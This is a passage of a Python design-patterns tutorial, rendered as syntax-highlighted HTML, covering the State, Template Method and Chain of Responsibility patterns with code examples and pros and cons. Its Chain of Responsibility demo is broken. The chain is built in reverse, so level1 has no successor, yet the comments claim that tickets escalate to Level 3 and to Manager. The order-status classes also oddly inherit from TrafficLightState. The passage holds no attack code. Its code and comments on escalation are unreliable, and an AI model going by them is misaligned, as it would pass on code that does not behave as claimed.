class="p">.</span><span class="nf">get_description</span><span class="p">())</span> <span class="c1"># Stop </span> <span class="c1"># Adding new state? Just create a new class # No modifications to existing code </span></code></pre> </div> <p><strong>Real-World Example: Order Status</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">PendingState</span><span class="p">(</span><span class="n">TrafficLightState</span><span class="p">):</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="n">context</span><span class="p">.</span><span class="nf">set_state</span><span class="p">(</span><span class="nc">ProcessingState</span><span class="p">())</span> <span class="k">class</span> <span class="nc">ProcessingState</span><span class="p">(</span><span class="n">TrafficLightState</span><span class="p">):</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="n">context</span><span class="p">.</span><span class="nf">set_state</span><span class="p">(</span><span class="nc">ShippedState</span><span class="p">())</span> <span class="k">class</span> <span class="nc">ShippedState</span><span class="p">(</span><span class="n">TrafficLightState</span><span class="p">):</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="n">context</span><span class="p">.</span><span class="nf">set_state</span><span class="p">(</span><span class="nc">DeliveredState</span><span class="p">())</span> <span class="k">class</span> <span class="nc">DeliveredState</span><span class="p">(</span><span class="n">TrafficLightState</span><span class="p">):</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Terminal state </span> <span class="c1"># Each state knows valid transitions # Business logic is clear </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Eliminates large conditional statements</li> <li>Each state is a separate class</li> <li>Easy to add new states</li> <li>State transitions are explicit</li> <li>Follows Single Responsibility</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>More classes</li> <li>Slight performance overhead</li> <li>Can be overkill for simple cases</li> </ul> <p><strong>My Take:</strong></p> <p>State is perfect for anything with multiple states and transitions.</p> <p>E-commerce orders, game loops, connection handling, authentication flows—they all benefit from State.</p> <p>The key insight: <strong>If you have state-dependent behavior, make each state a class.</strong></p> <p>This makes transitions explicit, state logic local, and new states easy to add.</p> <h3> 5. Template Method Pattern </h3> <p>The Template Method pattern defines the skeleton of an algorithm in a method, deferring some steps to subclasses.</p> <p>It lets subclasses redefine certain steps without changing the algorithm's structure.</p> <p>Think about making different beverages:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1. Boil water 2. Brew the drink material 3. Pour in cup 4. Add condiments </code></pre> </div> <p>The structure is the same for tea and coffee. Only steps 2 and 4 differ.</p> <p><strong>When to use it:</strong></p> <ul> <li>Algorithms with common structure but varying details</li> <li>Beverage makers (tea vs coffee)</li> <li>Data processing pipelines</li> <li>Document generation</li> <li>Game loops</li> <li>Testing frameworks</li> <li>Build processes</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">CoffeeRecipe</span><span class="p">:</span> <span class="k">def</span> <span class="nf">prepare_coffee</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="nf">boil_water</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">brew_coffee</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">pour_cup</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">add_sugar</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">add_cream</span><span class="p">()</span> <span class="k">class</span> <span class="nc">TeaRecipe</span><span class="p">:</span> <span class="k">def</span> <span class="nf">prepare_tea</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="nf">boil_water</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">brew_tea</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">pour_cup</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">add_honey</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">add_lemon</span><span class="p">()</span> <span class="c1"># Code duplication: boil_water, pour_cup # Method names are inconsistent # Client needs to know which method to call </span></code></pre> </div> <h3> Good code (with Template Method) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="k">class</span> <span class="nc">Beverage</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="c1"># Template method: defines algorithm structure </span> <span class="k">def</span> <span class="nf">prepare</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="nf">boil_water</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">brew</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">pour_cup</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="nf">add_condiments</span><span class="p">()</span> <span class="k">def</span> <span class="nf">boil_water</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Boiling water...</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">pour_cup</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Pouring into cup...</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Hook methods: subclasses override these </span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">brew</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">add_condiments</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">Coffee</span><span class="p">(</span><span class="n">Beverage</span><span class="p">):</span> <span class="k">def</span> <span class="nf">brew</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Brewing fresh coffee...</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">add_condiments</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Adding sugar and cream...</span><span class="sh">"</span><span class="p">)</span> <span class="k">class</span> <span class="nc">Tea</span><span class="p">(</span><span class="n">Beverage</span><span class="p">):</span> <span class="k">def</span> <span class="nf">brew</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Brewing tea...</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">add_condiments</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Adding honey and lemon...</span><span class="sh">"</span><span class="p">)</span> <span class="k">class</span> <span class="nc">HotChocolate</span><span class="p">(</span><span class="n">Beverage</span><span class="p">):</span> <span class="k">def</span> <span class="nf">brew</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Mixing cocoa with hot water...</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">add_condiments</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Adding whipped cream and marshmallows...</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Client code </span><span class="k">def</span> <span class="nf">make_beverage</span><span class="p">(</span><span class="n">beverage</span><span class="p">:</span> <span class="n">Beverage</span><span class="p">):</span> <span class="n">beverage</span><span class="p">.</span><span class="nf">prepare</span><span class="p">()</span> <span class="c1"># Same method for all beverages </span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Coffee:</span><span class="sh">"</span><span class="p">)</span> <span class="nf">make_beverage</span><span class="p">(</span><span class="nc">Coffee</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="s">Tea:</span><span class="sh">"</span><span class="p">)</span> <span class="nf">make_beverage</span><span class="p">(</span><span class="nc">Tea</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="s">Hot Chocolate:</span><span class="sh">"</span><span class="p">)</span> <span class="nf">make_beverage</span><span class="p">(</span><span class="nc">HotChocolate</span><span class="p">())</span> <span class="c1"># Algorithm structure is defined once # Subclasses only implement what's different </span></code></pre> </div> <p><strong>Real-World Example: Data Processing</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">DataProcessor</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="k">def</span> <span class="nf">process</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">filename</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="nf">read_file</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span> <span class="n">data</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="nf">validate</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="n">data</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="nf">transform</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="n">self</span><span class="p">.</span><span class="nf">save_results</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">read_file</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">filename</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">validate</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">transform</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span> <span class="k">pass</span> <span class="k">def</span> <span class="nf">save_results</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Saving results...</span><span class="sh">"</span><span class="p">)</span> <span class="k">class</span> <span class="nc">CSVProcessor</span><span class="p">(</span><span class="n">DataProcessor</span><span class="p">):</span> <span class="k">def</span> <span class="nf">read_file</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">filename</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Reading CSV: </span><span class="si">{</span><span class="n">filename</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="p">[</span><span class="sh">"</span><span class="s">row1</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">row2</span><span class="sh">"</span><span class="p">]</span> <span class="k">def</span> <span class="nf">validate</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Validating CSV format...</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">data</span> <span class="k">def</span> <span class="nf">transform</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Transforming CSV to objects...</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">data</span> <span class="k">class</span> <span class="nc">JSONProcessor</span><span class="p">(</span><span class="n">DataProcessor</span><span class="p">):</span> <span class="k">def</span> <span class="nf">read_file</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">filename</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Reading JSON: </span><span class="si">{</span><span class="n">filename</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="p">[{</span><span class="sh">"</span><span class="s">key</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">value</span><span class="sh">"</span><span class="p">}]</span> <span class="k">def</span> <span class="nf">validate</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Validating JSON schema...</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">data</span> <span class="k">def</span> <span class="nf">transform</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Transforming JSON to objects...</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">data</span> <span class="c1"># Same process for any format </span><span class="n">csv</span> <span class="o">=</span> <span class="nc">CSVProcessor</span><span class="p">()</span> <span class="n">csv</span><span class="p">.</span><span class="nf">process</span><span class="p">(</span><span class="sh">"</span><span class="s">data.csv</span><span class="sh">"</span><span class="p">)</span> <span class="n">json</span> <span class="o">=</span> <span class="nc">JSONProcessor</span><span class="p">()</span> <span class="n">json</span><span class="p">.</span><span class="nf">process</span><span class="p">(</span><span class="sh">"</span><span class="s">data.json</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Eliminates code duplication</li> <li>Defines algorithm structure once</li> <li>Makes it easy to add variants</li> <li>Follows DRY principle</li> <li>Subclasses only implement what's different</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Can be rigid if algorithm changes</li> <li>Subclasses can't fully control behavior</li> <li>Can be harder to understand flow</li> </ul> <p><strong>My Take:</strong></p> <p>Template Method is excellent for reducing duplication when you have multiple implementations of similar processes.</p> <p>Any time you see: "The process is mostly the same, but steps 2 and 4 are different," think Template Method.</p> <p>It's used everywhere:</p> <ul> <li> <strong>Django views</strong> inherit from base views</li> <li> <strong>Testing frameworks</strong> have setup/teardown hooks</li> <li> <strong>Build tools</strong> have standard phases</li> <li> <strong>Game engines</strong> have game loops</li> </ul> <p>The key insight: <strong>Define the algorithm's skeleton once, let subclasses fill in the details.</strong></p> <h3> 6. Chain of Responsibility Pattern </h3> <p>The Chain of Responsibility pattern passes requests along a chain of handlers.</p> <p>Each handler decides either to process the request or pass it to the next handler.</p> <p>Think about a support ticket system:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Level 1 Support → Can't resolve? ↓ Level 2 Support → Can't resolve? ↓ Level 3 Support → Can't resolve? ↓ Manager </code></pre> </div> <p>Each handler tries to solve it. If they can't, they pass it to the next handler.</p> <p><strong>When to use it:</strong></p> <ul> <li>Support ticket escalation</li> <li>Logging with multiple levels</li> <li>Request validation (multiple checks)</li> <li>Event handling (parent nodes pass to children)</li> <li>Middleware chains</li> <li>Approval workflows</li> <li>Exception handling</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">SupportTicket</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">issue</span><span class="p">,</span> <span class="n">priority</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">issue</span> <span class="o">=</span> <span class="n">issue</span> <span class="n">self</span><span class="p">.</span><span class="n">priority</span> <span class="o">=</span> <span class="n">priority</span> <span class="n">self</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">False</span> <span class="k">def</span> <span class="nf">handle_ticket</span><span class="p">(</span><span class="n">ticket</span><span class="p">):</span> <span class="c1"># Giant conditional chain </span> <span class="k">if</span> <span class="n">ticket</span><span class="p">.</span><span class="n">priority</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span> <span class="k">if</span> <span class="nf">level1_can_handle</span><span class="p">(</span><span class="n">ticket</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Level 1 resolved: </span><span class="si">{</span><span class="n">ticket</span><span class="p">.</span><span class="n">issue</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">ticket</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">else</span><span class="p">:</span> <span class="c1"># Pass to level 2 </span> <span class="k">if</span> <span class="nf">level2_can_handle</span><span class="p">(</span><span class="n">ticket</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Level 2 resolved: </span><span class="si">{</span><span class="n">ticket</span><span class="p">.</span><span class="n">issue</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">ticket</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">else</span><span class="p">:</span> <span class="c1"># Pass to level 3 </span> <span class="k">if</span> <span class="nf">level3_can_handle</span><span class="p">(</span><span class="n">ticket</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Level 3 resolved: </span><span class="si">{</span><span class="n">ticket</span><span class="p">.</span><span class="n">issue</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">ticket</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">else</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Manager will handle</span><span class="sh">"</span><span class="p">)</span> <span class="k">elif</span> <span class="n">ticket</span><span class="p">.</span><span class="n">priority</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span> <span class="c1"># Different logic for priority 2 </span> <span class="k">pass</span> <span class="c1"># Problems: # - Nested conditionals # - Hard to add new levels # - Logic is tightly coupled </span></code></pre> </div> <h3> Good code (with Chain of Responsibility) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="k">class</span> <span class="nc">SupportHandler</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">next_handler</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">next_handler</span> <span class="o">=</span> <span class="n">next_handler</span> <span class="k">def</span> <span class="nf">handle_ticket</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="nf">can_handle</span><span class="p">(</span><span class="n">ticket</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="nf">resolve</span><span class="p">(</span><span class="n">ticket</span><span class="p">)</span> <span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">next_handler</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">next_handler</span><span class="p">.</span><span class="nf">handle_ticket</span><span class="p">(</span><span class="n">ticket</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">No one could handle: </span><span class="si">{</span><span class="n">ticket</span><span class="p">.</span><span class="n">issue</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">can_handle</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">resolve</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">Level1Support</span><span class="p">(</span><span class="n">SupportHandler</span><span class="p">):</span> <span class="k">def</span> <span class="nf">can_handle</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="k">return</span> <span class="n">ticket</span><span class="p">.</span><span class="n">priority</span> <span class="o">&lt;=</span> <span class="mi">2</span> <span class="k">def</span> <span class="nf">resolve</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Level 1 resolved: </span><span class="si">{</span><span class="n">ticket</span><span class="p">.</span><span class="n">issue</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">ticket</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">class</span> <span class="nc">Level2Support</span><span class="p">(</span><span class="n">SupportHandler</span><span class="p">):</span> <span class="k">def</span> <span class="nf">can_handle</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="k">return</span> <span class="n">ticket</span><span class="p">.</span><span class="n">priority</span> <span class="o">&lt;=</span> <span class="mi">3</span> <span class="k">def</span> <span class="nf">resolve</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Level 2 resolved: </span><span class="si">{</span><span class="n">ticket</span><span class="p">.</span><span class="n">issue</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">ticket</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">class</span> <span class="nc">Level3Support</span><span class="p">(</span><span class="n">SupportHandler</span><span class="p">):</span> <span class="k">def</span> <span class="nf">can_handle</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="k">return</span> <span class="n">ticket</span><span class="p">.</span><span class="n">priority</span> <span class="o">&lt;=</span> <span class="mi">4</span> <span class="k">def</span> <span class="nf">resolve</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Level 3 resolved: </span><span class="si">{</span><span class="n">ticket</span><span class="p">.</span><span class="n">issue</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">ticket</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">class</span> <span class="nc">Manager</span><span class="p">(</span><span class="n">SupportHandler</span><span class="p">):</span> <span class="k">def</span> <span class="nf">can_handle</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="k">return</span> <span class="bp">True</span> <span class="c1"># Manager can handle anything </span> <span class="k">def</span> <span class="nf">resolve</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">ticket</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Manager resolved: </span><span class="si">{</span><span class="n">ticket</span><span class="p">.</span><span class="n">issue</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">ticket</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">True</span> <span class="c1"># Build the chain </span><span class="n">level1</span> <span class="o">=</span> <span class="nc">Level1Support</span><span class="p">()</span> <span class="n">level2</span> <span class="o">=</span> <span class="nc">Level2Support</span><span class="p">(</span><span class="n">level1</span><span class="p">)</span> <span class="n">level3</span> <span class="o">=</span> <span class="nc">Level3Support</span><span class="p">(</span><span class="n">level2</span><span class="p">)</span> <span class="n">manager</span> <span class="o">=</span> <span class="nc">Manager</span><span class="p">(</span><span class="n">level3</span><span class="p">)</span> <span class="c1"># Start with level1 (or any handler in the chain) </span><span class="k">class</span> <span class="nc">SupportTicket</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">issue</span><span class="p">,</span> <span class="n">priority</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">issue</span> <span class="o">=</span> <span class="n">issue</span> <span class="n">self</span><span class="p">.</span><span class="n">priority</span> <span class="o">=</span> <span class="n">priority</span> <span class="n">self</span><span class="p">.</span><span class="n">resolved</span> <span class="o">=</span> <span class="bp">False</span> <span class="c1"># Handle tickets </span><span class="n">ticket1</span> <span class="o">=</span> <span class="nc">SupportTicket</span><span class="p">(</span><span class="sh">"</span><span class="s">Can</span><span class="sh">'</span><span class="s">t login</span><span class="sh">"</span><span class="p">,</span> <span class="n">priority</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="n">level1</span><span class="p">.</span><span class="nf">handle_ticket</span><span class="p">(</span><span class="n">ticket1</span><span class="p">)</span> <span class="c1"># Level 1 handles it </span> <span class="n">ticket2</span> <span class="o">=</span> <span class="nc">SupportTicket</span><span class="p">(</span><span class="sh">"</span><span class="s">Database corruption</span><span class="sh">"</span><span class="p">,</span> <span class="n">priority</span><span class="o">=</span><span class="mi">4</span><span class="p">)</span> <span class="n">level1</span><span class="p">.</span><span class="nf">handle_ticket</span><span class="p">(</span><span class="n">ticket2</span><span class="p">)</span> <span class="c1"># Escalates through chain to Manager </span> <span class="n">ticket3</span> <span class="o">=</span> <span class="nc">SupportTicket</span><span class="p">(</span><span class="sh">"</span><span class="s">Slow performance</span><span class="sh">"</span><span class="p">,</span> <span class="n">priority</span><span class="o">=</span><span class="mi">3</span><span class="p">)</span> <span class="n">level1</span><span class="p">.</span><span class="nf">handle_ticket</span><span class="p">(</span><span class="n">ticket3</span><span class="p">)</span> <span class="c1"># Level 3 handles it </span> <span class="c1"># Add new handler? Just insert in the chain # No modifications to existing handlers </span></code></pre> </div> <p><strong>Real-World Example: Logging Levels</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">Logger</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">next_logger</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">next_logger</span> <span class="o">=</span> <span class="n">next_logger</span> <span class="k">def</span> <span class="nf">log</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">level</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="nf">should_log</span><span class="p">(</span><span class="n">level</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">next_logger</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">next_logger</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="n">level</span><span class="p">,</span> <span class="n">message</span><span class="p">)</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">should_log</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">level</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">ConsoleLogger</span><span class="p">(</span><span class="n">Logger</span><span class="p">):</span> <span class="k">def</span> <span class="nf">should_log</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">level</span><span class="p">):</span> <span class="k">return</span> <span class="n">level</span> <span class="o">&gt;=</span> <span class="mi">1</span> <span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Console: </span><span class="si">{</span><span class="n">message</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">class</span> <span class="nc">FileLogger</span><span class="p">(</span><span class="n">Logger</span><span class="p">):</span> <span class="k">def</span> <span class="nf">should_log</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">level</span><span class="p">):</span> <span class="k">return</span> <span class="n">level</span> <span class="o">&gt;=</span> <span class="mi">2</span> <span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">File: </span><span class="si">{</span><span class="n">message</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">class</span> <span class="nc">ErrorLogger</span><span class="p">(</span><span class="n">Logger</span><span class="p">):</span> <span class="k">def</span> <span class="nf">should_log</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">level</span><span class="p">):</span> <span class="k">return</span> <span class="n">level</span> <span class="o">&gt;=</span> <span class="mi">3</span> <span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Error Alert: </span><span class="si">{</span><span class="n">message</span><span class="si">}</span><span 